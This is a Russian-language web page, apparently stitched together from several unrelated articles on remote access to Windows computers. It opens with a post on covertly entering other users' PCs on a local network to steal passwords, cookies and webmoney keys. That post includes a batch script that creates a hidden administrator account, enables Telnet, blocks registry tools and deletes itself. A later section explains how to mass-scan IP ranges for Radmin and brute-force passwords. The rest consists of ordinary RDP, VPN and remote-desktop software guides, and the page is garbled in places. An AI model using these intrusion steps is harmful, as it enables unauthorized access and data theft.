Подключение к удаленному компьютеру по ip. Зачем это нужно. Настройка Internet-ID соединения

Леонид Якубович 2 февраля 2012 в 14:23

Простейший скрытый способ получить доступ к нужному ПК из домашней сети

• Чулан *

Привет всем, это моя первая статья на хабре, так что не судите строго. В этом посте я опишу как можно получить удаленный доступ к компьютеру пользователя в вашей локальной сети через командную строку, обходя все антивирусы и немного зная синтаксис командной строки Windows. Статья предназначена для использования только на Windows XP, но при желании можно переписать код под любую другую ОС семейства Windows. Итак, приступим. В целом, статья написана для пользователей начального уровня. Самая главная цель - это заполучить нужные данные (пароли, явки, дачи, доступ к почтовым ящикам, файлы ключей webmoney, куки и прочая важная перхоть) и уйти незаметно, не оставив следов проникновения. Итак, начнем, я нахожусь в локальной сети имеющей порядка 5000 пользователей, сеть со статикой или dhcp не имеет значения, мне розан ip адрес и я счастлив. В сети имеется тьма подсетей, роуты которых прописаны на серваке. MAC адрес компа прописан у админа сети, так как в моем случае, это было условие подключения к сетке, таким образом мой мак засветится в случае чего. Во избежание быть найденным, первым делом устанавливаем виртуальную машину (использовал VmWare 5.1), устанавливаем на нее XP, сканер портов (использовал SuperScan 3.00 Скачать можно ) и запускаем службу Telnet. Подключаем виртуальную машину к сети с помощью NAT и получаем таким образом совершенно другой mac-адрес машины смотрящей в сеть. Все гуд виртуалку поставили, идем дальше. Открываем обычный блокнот и пишем батник следующего содержания:

@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add »HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCU\SOFTWARE\POLICIES\Microsoft\MMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%\system32\compmgmt.msc >nul
del Start_game.bat

Теги: вирусы, взлом, безопасность, информационная безопасность

Распространённая задача: настроить удалённый доступ к компьютеру, который подключён к Интернету через роутер.

Решение: сделать перенаправление порта на роутере. Перенаправление порта ещё называют публикацией порта или пробросом порта . В английской терминологии используются термины Port Forwarding и Port Publishing .

Что такое проброс порта

Перенаправление порта — это сопоставление определённого внешнего порта шлюза (роутера, модема) с нужным портом целевого устройства в локальной сети (сервера, рабочей станции, сетевого хранилища, камеры, регистратора и т.п.)

А вот какой порт пробрасывать, зависит от того, каким способом вы хотите получать доступ к компьютеру.

Как настроить удалённый доступ через RDP (удалённый рабочий стол, терминал)

Подключения по протоколу RDP осуществляются на порт целевого 3389 компьютера. Что нужно сделать:

Шаг 1 Разрешить входящие RDP подключения на компьютере

Внимание! Осуществлять ВХОДЯЩИЕ подключение через Удалённый рабочий стол возможно к следующим редакциям ОС Windows:
Windows XP Professional;
Windows 7/8.1 Professional;
Windows 7/8.1 Ultimate;
Windows 7/8.1 Corporate.

В Windows XP Starter, Home Edition, в Windows Vista/7/8/8.1 Starter, Home Basic, Home Premium возможность входящих подключений отсутствует.

Для этого открываем Свойства системы (WIN+Break), нажимаем на ссылку Дополнительные параметры системы:

Переходим на вкладку Удалённый доступ , ставим переключатель в положение Разрешать подключения к этому компьютеру , снимаем галку Разрешать подключения только с компьютеров, на которых работает удалённый рабочий стол с проверкой подлинности на уровне сети (рекомендуется) и нажимаем ОК для применения настройки:

Шаг 2 Создать на компьютере учётную запись, под которой будет подключаться пользователь удалённого рабочего стола.

Требование №1. Эта учётная запись обязательно должна иметь пароль . Согласно настроек по умолчанию локальной политики безопасности, учётным записям без пароля подключение по RDP запрещено. Разрешать удалённый доступ незапароленным учётным записям в политиках безопасности не рекомендуется. Это создаст угрозу несанкционированного доступа со стороны злоумышленников.

Требование №2. Если пользователь НЕ является администратором на локальном компьютере, его необходимо добавить в группу . Это можно сделать двумя способами.

Как разрешить пользователю без административных привилегий подключаться к удалённому рабочему столу

Способ первый.

Нажмите правой кнопкой по системному ярлыку Этот компьютер и выберите Управление :

В окне Управление компьютером выберите Локальные пользователи и группы => Пользователи :

В списке найдите нужного пользователя и двойным щелчком вызовите его свойства:

Перейдите на вкладку Членство в группах и нажмите кнопку Добавить :

Нажмите кнопку Дополнительно :

Затем, кнопку Поиск :

Выделите в списке группу Пользователи удалённого рабочего стола и нажмите OK :

В окнах Выбор группы и Свойства: <пользователь> нажмите OK:

Способ второй.

Вызовите свойства системы (Win+Break) , нажмите Дополнительные параметры:

Зайдите на вкладку Удалённый доступ и нажимаем кнопку Выбрать пользователей :

Нажмите кнопку Добавить :

Нажмите Дополнительно :

и Поиск :

В списке выберите учётную запись пользователя, которому хотите предоставить права для удалённого доступа, и нажмите OK :

Теперь нажмите OK в двух следующих окнах:

Шаг 3 Создать на роутере правило проброса, согласно которому при запросе на заданный порт подключение будет перенаправляться на порт 3389 нужного компьютера.

В роутерах D-Link нужный раздел может называться Virtual Server , как в D-Link DIR-615:

Также, он может называться Port Forwarding , как, например, в DIR-300:

Суть одна и та же:

1. Даём произвольное имя правилу;
2. Открываем НЕстандартный порт на роутере, который не занят (поле Public Port );
3. Указываем IP-адрес целевого компьютера в сети, куда должен попадать удалённый пользователь (поле IP-Address );
4. Указываем номер порта, через который работает приложение или служба на компьютере. В нашем случае, для службы сервера удалённых рабочий столов это порт 3389 (поле Private Port ).

Если ваш провайдер выдаёт вашему роутеру динамический адрес, вам удобно воспользоваться службой Dynamic DNS. У компании D-Link есть свой сервис, где можно бесплатно зарегистрировать Интернет-адрес (т.е. домен) и настроить доступ к вашему роутеру и локальной сети через него.

Для настройки Dynamic DNS зайдите в раздел MAINTENANCE , выберите подраздел DDNS Settings и нажмите на ссылку Sign up … для перехода на сайт и регистрации домена. Затем настройте синхронизацию домена с IP-адресом роутера в области DYNAMIC DNS SETTINGS и сохраните настройки кнопкой Save Settings :

После этого можно будет подключаться не по IP-адресу, а по адресу вида vash-adres.dlinkddns.com:port

Проверка подключения к компьютеру через удалённый рабочий стол

Запустите клиент сервера удалённых рабочих столов:

В поле Компьютер введите адрес и порт через двоеточие. В поле Пользователь введите имя пользователя и нажмите кнопку Подключить :

Это удалённое подключение может нанести вред локальному или удалённому компьютеру. Перед подключением убедитесь, что удалённый компьютер надёжен.

Установите галку и нажмите кнопку Подключить :

Теперь введите пароль пользователя, установите галку Запомнить учётные данные , если не хотите вводить пароль каждый раз, и нажмите OK :

После этого может появиться сообщение:

Не удаётся проверить подлинность удалённого компьютера. Вы хотите установить подключение в любом случае?

Здесь можно установить галку Больше не выводить запрос о подключениях к этому компьютеру и нажать Да :

Инструкция

Вы должны знать ip-адрес компьютера, к которому хотите подключиться. Если известно доменное имя, можно определить ip на одном из существующих в сервисов. Например, здесь: http://www.all-nettools.com/toolbox/smart-whois.php
Введите доменное имя в формате www.name.ru – то есть имя сайта без «http://», нажмите кнопку «Submit». Вы получите ip-адрес и всю дополнительную информацию о сайте.

Теперь вам необходимо определить, какие порты на интересующем вас компьютере открыты. Делается это путем сканирования с использованием специальных программ – сканеров. Наиболее известные сканеры – Nmap и XSpider. Новичку лучше выбрать второй, в сети можно найти как демоверсию, так и полный вариант программы.

Откройте XSpider, ведите ip-адрес, запустите сканирование. После его окончания вы получите список открытых портов на сканируемой машине. Наличие не означает, что вы получили доступ к удаленному компьютеру и говорит лишь о том, что этот порт используется какой-то программой. Например, порт 21 – ftp, 23 – telnet, 4988 – Radmin, 3389 - Remote Desktop‎ и т.д. Наберите в поисковике «Список портов и их сервисов», и вы получите подробную информацию.

Вы получили список открытых портов. Следующий этап – поиск возможности проникнуть через эти порты на . Вариантов здесь много, основные – подбор пароля либо поиск и использование подходящего эксплоита. Эксплоит – это программный код, написанный под конкретную уязвимость.

Если вы хотите научиться использовать эксплоиты, скачайте программу Metasploit. В ее состав входят несколько сотен эксплоитов, их состав постоянно . В составе Метасплоита есть и сканер Nmap. Изучение программы требует времени и терпения, но результат того стоит.

Если вы хотите быстрого результата, скачайте две программы: VNC-сканер с Gui-интерфейсом (vnc_scanner_gui) и Lamescan. Первая является очень хорошим и быстрым сканером, удобным при сканировании конкретного порта. Например, порта 4899, используемого программой удаленного управления Radmin.

Запустите VNC-сканер, укажите порт 4899, выберите в списке нужную страну и нажмите кнопку «Get diap list». В окошке слева появится список диапазонов ip-адресов. Выберите несколько диапазонов (лучше 2-3), остальные удалите. Нажмите кнопку «Start scan». После окончания процесса сканирования вы получите текстовый файл IPs.txt со списком ip-адресов компьютеров, у которых порт 4899. Нажмите кнопку «Start parser» - список будет очищен от всей лишней информации, останутся только ip-адреса.

Запустите программу Lamescan. Нажмите в меню «Настройка – Основное». Поставьте номер порта 4899. Введите пути к словарям паролей и логинов (найдите их в сети). Нажмите «Готово». Теперь нажмите зеленый плюсик и введите в появившееся окно ваши насканенные ip-адреса и нажмите зеленую стрелку. Начнется процесс подбора пароля к указанным адресам. В большинстве случаев подбор оказывается неудачным, но из сотни адресов несколько окажутся с простыми паролями.

Скачайте и установите программу Radmin. Запустите ее, введите адрес компьютера с подобранным паролем. В появившемся окне введите пароль (и логин – если подобрали данные к программе с логином и паролем). Появится синий значок соединения, и несколько секунд спустя вы увидите у себя на экране рабочий стол удаленного компьютера.

Обратите внимание

Незаконное проникновение на чужой компьютер уголовно наказуемо. Статья дана исключительно в целях ознакомления и не должна рассматриваться как руководство к действию. Вся ответственность в случае использования в незаконных целях упомянутых в статье программ ложится на вас.

Полезный совет

Сканируя ip-адреса, используйте прокси-серверы. Для удобства воспользуйтесь программой Proxifier.

Подключение к портам компьютера для разных устройств происходит зачастую по определенным сценариям, однако последнее время тенденция идет к универсализации этого процесса, в частности это касается использования USB-порта.

Инструкция

Для подключения к USB-порту компьютера телефона, имеющего съемный носитель памяти, воспользуйтесь специальным кабелем, который обычно входит в комплект мобильного устройства. Выберите в режим накопителя и используйте его в качестве съемного диска.

Если вы хотите использовать память телефона при подключении к порту компьютера, запустите специальное программное обеспечение с диска, который также идет в комплекте. Обратите особое внимание на наличие драйвера USB 2.0, поскольку это является обязательным условием для быстродействия устройств, подключаемых при помощи интерфейса USB.

Для подключения к USB-порту устройств производства компании Apple используйте специальные кабели, которые идут в комплекте или продаются отдельно. При подключении обязательно должно быть запущено программное обеспечение, поскольку без него память устройства и выполнение различных настроек будет невозможно.

Для подключения мобильных устройств (обычно относится к устаревшим моделям) к последовательному коммуникативному порту воспользуйтесь специальным кабелем, подходящим по разъему к вашему телефону. Второй его конец должен закрепляться в разъеме материнской платы специальными винтами, поскольку в противном случае стабильность работы не гарантируется.

Также использование данного порта для подключения устройств принтеров, сканеров и другого оборудования подразумевает под собой наличие запущенного программного обеспечения и установленных драйверов на материнскую плату. Подключение к данному порту характерно для морально устаревшего оборудования ввиду удобства использования USB-интерфейса, поэтому в последних моделях устройств материнской платы такой порт может просто отсутствовать. Также этот порт еще называют аббревиатурой COM.

Видео по теме

Полезный совет

Используйте оригинальные кабели при подключении устройств к портам компьютера.

Удаленное открытие в операционной системе Microsoft Windows может быть выполнено с помощью специализированной утилиты Netsh, предназначенной для конфигурации параметров сети.

Инструкция

Вызовите главное меню операционной системы Microsoft Windows нажатием кнопки «Пуск» для выполнения операции открытия необходимого порта удаленно и введите значение cmd в текстовое поле строки поиска.

Подтвердите выполнение команды нажатием кнопки «Найти» и вызовите контекстное меню найденного элемента «Командная строка» кликом правой кнопки мыши.

Укажите команду «Запуск от имени администратора» и введите значение netsh (для OS Windows до версии XP) или netsh advfirewall (для OS Windows версий Vista или выше) в текстовое поле интерпретатора команд.

Используйте следующий синтаксис для выполнения процедуры открытия порта :netsh advfirewall firewalladd rule name=имя_приложенияdir=in action=allowprotocol=TCP localport=номер_порта Подтвердите команду нажатием функциональной клавиши Enter.

Помните, что процедура удаленного открытия необходимого порта подразумевает предварительное подключение к выбранному компьютеру. Для этого необходимо выполнить вход в систему с учетной записью администратора удаленного компьютера и ввести значение netsh advfirewall set machine win2008-2 (пример для Windows Server 2008) в текстовое поле инструмента «Командная строка». После этого требуется подтвердить выполнение команды подключения нажатием функциональной клавиши Enter.

Определите текущую конфигурацию IP-адреса, шлюза, маски подсети и DNS-сервера введением значения netsg interface ip show config в текстовое поле интерпретатора команд и нажмите функциональную клавишу Enter для подтверждения выполнения команды.

Воспользуйтесь опцией включения или отключения файервола Windows введением значения netsh advfirewall set currentprofile state on или netsh advfirewall set currentprofile state off и подтвердите свой выбор нажатием функциональной клавиши Enter.

Источники:

• Настройка сетевых параметров с помощью Netsh в 2018

От способа подключения к интернету зависит стоимость услуги, скорость передачи данных, наличие или отсутствие мобильности. Делать свой выбор следует с учетом требований, предъявляемых к каналу, а также собственных возможностей.

Одновременная работа на нескольких компьютерах, из которых только один находится перед вами, а остальные — хоть на другой стороне Земли, — не фантастика. Чтобы обладать этой чудо-возможностью, достаточно доступа в Интернет и программы удаленного управления на каждой машине.

Программы удаленного управления — это мостики, соединяющие ПК или мобильный гаджет, который находится перед вами, с различными компьютерными устройствами по всему миру. Конечно, при наличии у вас ключа, то есть пароля, разрешающего удаленное соединение с ними.

Возможности программ такого рода весьма широки. Это и доступ к содержимому дисков, и запуск установленных приложений, и изменение системных настроек, и просмотр действий пользователя… Словом, они позволяют делать на удаленном ПК почти всё то же, что и на локальном. Сегодняшняя статья — это обзор шести бесплатных программ удаленного управления компьютером на базе Windows (и не только), одно из которых входит в состав самой операционной системы.

Если вам нужно установить соединение двух компьютеров или ПК и мобильного девайса, один из которых (удаленный), находится под управлением Windows, а второй — под Windows, iOS, Android или Mac OS X, иногда можно обойтись без сторонних программ (если в соединении участвуют только Windows-компьютеры). Системное приложение «Удаленный рабочий стол» присутствует во всех выпусках «винды», начиная с XP. Не обязательно, чтобы на обеих машинах стояла одна и та же версия ОС, вы без проблем установите соединение, например, между Windows 10 и Windows 7.

Приложение Microsoft Remote Desktop для Android и Apple доступны для бесплатного скачивания в Google Play и App Store .

Что еще необходимо для создания подключения:

• Разрешение на удаленный доступ — настраивается на компьютере, которым вы собираетесь управлять извне.
• Учетная запись с паролем на удаленном компьютере. Для решения административных задач (установки и удаления программ, изменения системных настроек и т. п.) нужна учетка с правами администратора.
• Подключение обеих машин к Интернету или нахождение их в одной локальной сети.
• На принимающей стороне — открытый порт TCP 3389 (используется удаленным рабочим столом по умолчанию).

Как включить разрешение

Эта и дальнейшие инструкции показаны на примере Windows 10.

• Щелкнем правой клавишей мышки по значку «Этот компьютер» на рабочем столе. Откроем «Свойства».

• Находясь в окошке «Система», щелкнем в панели перехода «Настройку удаленного доступа». В разделе окна «Удаленный рабочий стол» поставим метку «Разрешить…» (флажок «Разрешить подключения только с проверкой подлинности» лучше оставить). Следом нажмем «Выбор пользователей».

• Для добавления пользователя, которому будет разрешено удаленное соединение с вами, нажмем «Добавить». В поле «Введите имена» впишем имя его учетной записи на этом компьютере (не забывайте, она должна быть с паролем!), нажмем «Проверить имена» и ОК.

На этом настройка завершена.

Как настроить параметры подключения

Следующие действия выполняем на компьютере, с которого будем осуществлять удаленное соединение.

• Щелкнем по иконке поиска в панели задач и начнем вводить слово «удаленное». Выберем из найденного «Подключение к удаленному рабочему столу».

• По умолчанию окошко приложения открывается свернутым, где есть лишь поля для ввода имени компьютера и данных пользователя. Чтобы получить доступ ко всем настройкам, кликнем стрелку «Показать параметры». Внизу первой вкладки — «Общие», находится кнопка сохранения параметров подключения в файл. Это удобно, когда вы используете разные настройки для соединения с разными машинами.

• Следующая вкладка — «Экран», позволяет менять свойства изображения экрана удаленного компьютера на вашем мониторе. В частности — увеличивать и уменьшать разрешение, задействовать несколько мониторов, менять глубину цвета.

• Далее настроим «Локальные ресурсы» — звук с удаленного компьютера, условия использования клавиатурных сокращений, доступ к удаленному принтеру и буферу обмена.

• Параметры вкладки «Взаимодействие» влияют на скорость соединения и качество демонстрации картинки с удаленной машины на вашем мониторе.

• Вкладка «Дополнительно» позволяет определить действия при неудачной проверке подлинности удаленного ПК, а также задать параметры соединения при подключении через шлюз.

• Для начала сеанса удаленного доступа нажмем «Подключить» В следующем окошке введем пароль.

После установки соединения сеанс работы за компьютером текущего пользователя будет завершен и управление перейдет к вам. Пользователь удаленного ПК не сможет видеть свой рабочий стол, так как вместо него на экране появится заставка.

Следуя этой инструкции, вы без проблем соединитесь с компьютером, который находиться в одной сети с вашим. Если же устройства подключены к разным сетям, придется сделать несколько дополнительных настроек.

Как подключиться к удаленному компьютеру через Интернет

Есть 2 способа настройки подключения Удаленного рабочего стола Windows через Интернет – путем создания канала VPN, чтобы устройства видели друг друга так же, как если бы находились в одной локальной сети, и путем перенаправления порта 3389 в локальную сеть и изменения динамического (переменного) IP-адреса удаленной машины на постоянный (статический).

Способов создания каналов VPN предостаточно, но описание их всех займет довольно много места (кроме того, масса информации об этом без труда находится в сети). Поэтому рассмотрим для примера один из простых – собственными средствами Windows.

Как создать VPN-канал в Windows

На удаленной машине, которая будет сервером:

После этого в папке сетевых подключений появится компонент «Входящие подключения», который и будет VPN-сервером. Чтобы соединение не блокировалось файерволом, не забудьте открыть на устройстве порт TCP 1723. А если серверу присвоен локальный IP-адрес (начинается на 10, 172.16 или 192.168), порт придется перенаправить во внешнюю сеть. Как это сделать, читайте ниже.

На клиентском компьютере (Windows 10) соединение настраивается еще проще. Запустите утилиту «Параметры», зайдите в раздел «Сети и Интернет» -> «ВПН». Нажмите «Добавить ВПН-подключение».

В окне параметров укажите:

• Поставщик услуг – Виндовс.
• Имя подключения – любое.
• Имя или адрес сервера – IP или доменное имя сервера, который вы создали перед этим.
• Тип VPN – определять автоматически или PPTP.
• Тип данных для входа – логин и пароль (одной из учетных записей, которой вы дали разрешение на доступ). Чтобы не вводить эти данные при каждом подключении, пропишите их в соответствующие поля ниже и поставьте метку «Запомнить».

Перенаправление порта на роутере и получение статического IP

Перенаправление (проброс) портов на разных устройствах (роутерах) выполняется по-своему, но общий принцип везде один и тот же. Рассмотрим, как это делается, на примере типового домашнего маршрутизатора TP-Link.

Откроем в админ-панели маршрутизатора раздел «Переадресация» и «Виртуальные серверы». В правой половине окна кликнем кнопку «Добавить».

В окне «Добавить или изменить запись» введем следующие настройки:

• Порт сервиса: 3389 (или 1723, если вы настраиваете VPN).
• Внутренний порт – тот же.
• ИП-адрес: адрес компьютера (смотрим в свойствах подключения) или доменное имя.
• Протокол: TCP или все.
• Стандартный порт сервиса: можно не указывать либо выбрать из списка PDP, а для VPN – PPTP.

Как сделать изменяемый IP-адрес постоянным

В стандартный пакет услуг Интернет-провайдеров для домашних абонентов, как правило, входит только динамический IP-адрес, который постоянно меняется. А закрепление за пользователем неизменного IP обычно обходится ему в круглую сумму. Чтобы вам не приходилось нести лишние расходы, существуют сервисы DDNS (динамических DNS), задача которых – присвоение постоянного доменного имени устройству (компьютеру) с изменяющимся сетевым адресом.

Многие DDNS-сервисы предоставляют свои услуги бесплатно, но есть и такие, кто взымает за это небольшую абонентскую плату.

Ниже привожу краткий список бесплатных DDNS, чьих возможностей для нашей задачи более чем достаточно.

Правила пользования этими сервисами если и различаются, то незначительно: сначала проходим регистрацию учетной записи, потом — подтверждаем email-адрес, и наконец – регистрируем доменное имя вашего устройства и активируем его. После этого ваш домашний компьютер будет иметь собственное имя в Интернете, например, 111pc.ddns.net. Это имя следует указать в настройках подключения вместо IP или имени в локальной сети.

Кстати, некоторые роутеры поддерживают лишь небольшую группу поставщиков DDNS, например, только старейшие и самые известные DynDNS (ныне платный) и No IP . А другие — такие, как Asus, имеют собственный DDNS-сервис. Убрать ограничения помогает установка на роутер альтернативной прошивки DD-WRT.

Плюсы и минусы использования Удаленного рабочего стола Windows

Основное преимущество проприетарного средства Windows перед сторонними разработками – это отсутствие серверов-посредников при соединении, а значит, снижение риска утечки данных. Кроме того, этот инструмент имеет массу гибких настроек и при умелом подходе может стать «неприступной крепостью» и «космической ракетой».

Другие плюсы рабочего стола Windows – отсутствие необходимости что-то скачивать, ограничений по длительности сессии, количеству подключений и бесплатность.

Недостатки – сложность настройки для доступа через Интернет, уязвимость к атакам Pass the Hash.

TeamViewer

Перед тем как начать пользоваться сервисом, вам придется зарегистрировать учетную запись Google (пользователи Android-девайсов ее уже имеют) либо авторизоваться под ней в браузере Google Chrome.

Главное окно «Рабочего стола Chrome» включает 2 раздела:

• Удаленная поддержка. Здесь содержатся опции управления разовым подключением к другому ПК и предоставления доступа к вашему.
• Мои компьютеры. В этом разделе собраны машины, с которыми вы ранее устанавливали связь и можете быстро подключаться к ним по заданному пин-коду.

При первом сеансе связи с помощью «Рабочего стола Chrome» на удаленный компьютер установится дополнительный компонент (хост), что займет 2-3 минуты. Когда всё будет готово, на экране появится секретный код. После ввода его в соответствующее поле нажмите «Подключение».

Как и при работе с TeamViewer, пользователь удаленной машины сможет видеть на экране все ваши действия. Так что для скрытой слежки, например, за ребенком, эти программы не годятся.

— очень простая и столь же надежная утилита, предназначенная для удаленного управления компьютерами под Windows и Linux. Ее главные плюсы — легкость использования, безотказность, высокая скорость соединения а также то, что она не требует установки. Минусы — в отсутствии мобильных версий (установить соединение через Android и iOS с помощью этой программы не получится) и в том, что многие антивирусы считают ее вредоносной и стремятся удалить. К счастью, последнее несложно предотвратить, добавив утилиту в исключения.

Ammyy Admin поддерживает 2 способа установления связи — по ID-номеру и по IP-адресу. Второй работает только по локальной сети.

Окно утилиты поделено на 2 половины — «Клиент», где находятся идентификационные данные компьютера и пароль, и «Оператор» — с полями для ввода этих данных. Здесь же расположена кнопка подключения.

Книга контактов и настройки программы, которые довольно просты, скрыты в меню «Ammyy».

— еще одна компактная переносная Windows-программка, внешне похожая на предыдущую, но с более интересным набором функций. Поддерживает 2 способа подключения — по ID и IP, и 3 режима — полное управление, файловый менеджер (передача файлов) и только просмотр экрана удаленного ПК.

Еще она позволяет определять несколько уровней прав доступа:

• Использование удаленным оператором клавиатуры и мыши.
• Синхронизация буфера обмена.
• Изменение прав доступа администратором и т. д.

Режим «Только просмотр» может использоваться для скрытого наблюдения за действиями пользователей удаленных машин (детей, работников), чего нет в аналогичных продуктах.

В главном окне AeroAdmin находится кнопка открытия email-чата (расположена рядом с кнопкой «Остановить»). Чат предназначен для быстрой отправки электронного письма оператору, например, с просьбой о помощи. Эта функция уникальна, так как в программах-аналогах присутствует лишь обычный чат для обмена текстовыми сообщениями. И он начинает работать только после установления связи.

К сожалению, книга контактов AeroAdmin становится доступной не сразу. Она требует отдельной активации — через Facebook. И пользоваться ею могут только участники этой социальной сети, так как для получения кода активации разработчики запрашивают ссылку на личную страницу. Выходит, что тем, кому программа понравилась, без регистрации на Фейсбуке не обойтись.

Еще одна особенность AeroAdmin — это допустимость бесплатного использования даже в коммерческих целях, если не нужны дополнительные возможности (непрерывное подключение, множественные параллельные сессии и т. п.), доступные только в платных версиях.

— последняя в сегодняшнем обзоре утилита для удаленного подключения к Windows-ПК с другого компьютера или мобильного устройства. Может использоваться и без инсталляции, и с ней.

Как и предшественники, обладает рядом уникальных функций:

• Самая высокая скорость передачи картинки с удаленной машины.
• Самый быстрый обмен файлами, даже при низкой скорости Интернета.
• Поддержка одновременного подключения нескольких удаленных пользователей. Возможность совместной работы над одним проектом (у каждого пользователя свой курсор).

Плюс, как и остальные программы этого класса, AnyDesk предоставляет оператору полный доступ к функциям удаленной машины, очень просто подключается (по ID и паролю) и надежно защищает передаваемые данные.

Удалённый доступ - отличное средство, если нужно помочь с компьютером человеку, находящемуся вдали, или срочно просмотреть рабочие файлы из дома. Рассмотрим, какие программы для этого можно использовать, как их настраивать и применять в работе.

Что такое удалённый доступ

Удалённый доступ - это технология, позволяющая пользователю подключиться к компьютеру на расстоянии с помощью другого устройства и управлять им так, как если бы он сам сидел за этим компьютером. Это может быть и подключение к рабочей машине из дома, и помощь другу с установкой программ - вариантов много. Главное условие - наличие на обоих устройствах выхода в интернет и специальной программы.

Для организации удалённого доступа существует множество программ, как сложных, так и очень простых, некоторые из которых мы постараемся осветить.

Устройство в сети удалённого доступа может играть две роли:

• хост - компьютер, к которому предоставляется доступ (например, рабочий компьютер, на котором нужно поработать из дома);
• клиент - машина, осуществляющая доступ к другим устройствам.

Один и тот же компьютер в разных ситуациях может использоваться и как хост, и как клиент - но не одновременно.

Каждому устройству присваивается свой идентификатор - метка, с помощью которой устройства «находят» друг друга в сети. В большинстве случаев подключение происходит так: клиенту выдаётся идентификатор хоста, тот находит его в сети и подключается к нему, предоставляя пользователю доступ. В целях защиты также может потребоваться уникальный одноразовый пароль, который виден только хосту: это делается, чтобы к компьютеру не мог подключиться недоверенный человек.

Некоторые программы применяют в качестве идентификатора сгенерированный уникальный номер ID, некоторые предпочитают использовать IP-адрес и доменное имя. Мы рассмотрим и те, и другие.

Удалённый доступ через ID

Сначала поговорим о программах, оперирующих ID. Они довольно просты в применении и подходят для бытовых нужд обыкновенных пользователей, но не лишены своих недостатков.

AeroAdmin

Видео: использование TeamViewer

Ammyy Admin

Ammyy - ещё одна программа для удалённого доступа, отличающаяся простотой и минимализмом.

Функций у неё меньше, чем у TeamViewer, но она прекрасно подойдёт людям, у которых нет особых требований к функциональности: Ammyy проста и очень удобна, а также бесплатна.

Интерфейс программы похож на предыдущую: есть окно, в окне указаны ваши данные как хоста и форма для подключения других компьютеров. Подключиться можно как по ID, так и по IP.

Главное окно Ammyy Admin предоставляет возможность как подключить свой компьютер к клиенту, так и самому стать клиентом

В отличие от TeamViewer, Ammyy Admin не запрашивает пароль: вместо этого она требует, чтобы хост обязательно подтвердил согласие на подключение. Без согласия хоста сеанс связи не начнётся.

Ammyy ждёт, пока хост даст разрешение на соединение

Главный минус - такой же, как и у TeamViewer: бесплатная версия предполагает ограничения в использовании программы, которые устраняются только покупкой полной версии.

Видео: работа с Ammyy Admin

LiteManager

Третьей программой, осуществляющей доступ по ID, является LiteManager - российская программа, построенная на основе утилиты от Microsoft, ныне закрытой. Точно так же разделяясь на бесплатную и платную версию, LiteManager предоставляет «бесплатным» пользователям куда больше возможностей, чем предыдущие программы: например, к своему клиенту можно подключать не 5 компьютеров, а все 30. Такая лояльность делает программу привлекательной не только для простых пользователей, но и для администраторов небольших сетей.

В отличие от других рассмотренных средств, LiteManager состоит из двух компонентов, которые устанавливаются отдельно друг от друга: клиентская (устанавливается на клиентской машине) и серверная (соответственно, на хосте) часть.

При установке серверной части для неё задаётся пароль, который впоследствии и используется клиентом для подключения к хосту.

Интерфейс клиента отличается от предыдущих программ и скорее напоминает окно менеджера виртуальных машин. В нём указан список подключённых устройств, каждое из которых можно запустить с помощью мыши.

В интерфейсе LiteManager отображаются подключенные устройства, которые можно запустить кликом мыши

Возможности LiteManager в некотором роде повторяют функционал TeamViewer и даже превышают его. Подключаться можно как по IP, так и по ID; также здесь есть удобная функция отображения, обозначаемая как карта сети. С её помощью можно представить все вовлечённые в сеть компьютеры в виде карты, которая отображает соединение хостов с клиентом, а также подключённые принтеры и прочие устройства.

Карта сети в LiteManager - это возможность просмотреть подключенные устройства в виде карты

Видео: как пользоваться LiteManager

Удалённый доступ с помощью IP-адреса

Здесь всё несколько сложнее. Дело в том, что IP-адрес обыкновенного пользователя - динамический, то есть, регулярно меняется, и, если нужно постоянно соединяться через IP, будет очень неудобно каждый раз настраивать программу заново. Поэтому, чтобы в полной мере использовать удалённый доступ через IP, необходимо подключить услугу статического IP. Это делается у провайдера и стоит около 200 рублей в месяц (в зависимости от провайдера цены могут меняться).

После подключения услуги вам выдадут статический (неизменный) IP, и вы сможете использовать удалённое подключение. Однако услугу стоит использовать на свой страх и риск: обычному пользователю ПК статический адрес, в силу его меньшей безопасности, способен принести проблемы.

В качестве альтернативы можно использовать сервис DynDNS, который за определённую плату выдаёт пользователю виртуальный сервер - через него и будет проходить подключение. Однако такая услуга стоит дороже, чем статический IP.

Когда статический IP получен, нужно открыть необходимый для работы программы порт.

Теперь, когда настройки применены, самое время перейти к самой программе.

Radmin

Программа Radmin долгое время (до появления TeamViewer и прочих систем, использующих ID) была лидером среди систем удалённого доступа. Она очень легковесна, нетребовательна к системным ограничениям (поэтому хорошо «идёт» на старых компьютерах), а также обеспечивает высокую скорость подключения. Однако эта программа работает только через IP-адрес.

Radmin состоит из клиентской и серверной частей, причём после установки потребуется определённая настройка.

Radmin - платная программа, однако бесплатную 30-дневную пробную версию можно скачать на официальном сайте .

Видео: как настраивать и пользоваться Radmin

Remote Desktop

Это не программа от сторонних разработчиков. Это встроенное средство для удалённого администрирования от Microsoft, которое, как правило, работает только в локальной сети. Для работы с ним также потребуются статический IP-адрес и настройка порта, о которых написано выше. Порт, правда, нужно указывать другой: 3389.

Чтобы Remote Desktop работал, нужно дать ему разрешение. Для этого нужно пройти по пути «Пуск - Панель управления - Система - Настройка удалённого доступа» и отметить галочками «Разрешить подключение…» везде, где это возможно.

Чтобы встроенная служба Windows Remote Desktop работала, ей нужно задать разрешения

Remote Desktop находится через поиск меню «Пуск» как «Подключение удалённого рабочего стола». Выглядит он таким образом: окно, в которое вводятся данные компьютера-хоста (IP-адрес и имя пользователя).

Для подключения через классическое приложение Windows нужно ввести данные компьютера-хоста

Если всё хорошо, то этого будет достаточно для подключения.

Итак, мы выяснили, как пользоваться программами для удалённого доступа и в чём они могут помочь как простому пользователю, так и администратору сети. Теперь главное - вовремя применить полученные знания!